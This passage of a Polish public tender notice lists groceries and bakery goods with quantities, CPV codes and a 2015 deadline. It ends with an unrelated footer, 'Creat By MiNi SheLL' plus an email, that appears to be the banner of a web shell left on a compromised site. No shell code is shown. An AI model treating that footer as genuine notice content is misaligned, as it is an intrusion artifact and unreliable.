73.	Musztarda Rosyjska słoik 200g	szt.	30
74.	Makaron ryżowy op. 250g	kg	30
75.	Czosnek granulowany op. 1kg	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.31.00.00-4, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo świeże, wyroby piekarskie i cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Chleb krojony pakowany waga co najmniej 550g	szt.	5700
2.	Rogal maślany 100g	szt.	400
3.	Bułka Kajzerka 	szt.	4500
4.	Parówka krojona pakowana waga co najmniej 500g	szt.	300
5.	Bułka tarta 	kg	500
6.	Drożdżówka z dżemem	szt.	600
7.	Gniazdko 	szt.	1000
8.	Pączek 90g	szt.	1200
9.	Croissant maślany	szt.	1000
10.	Cebularz 50g	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com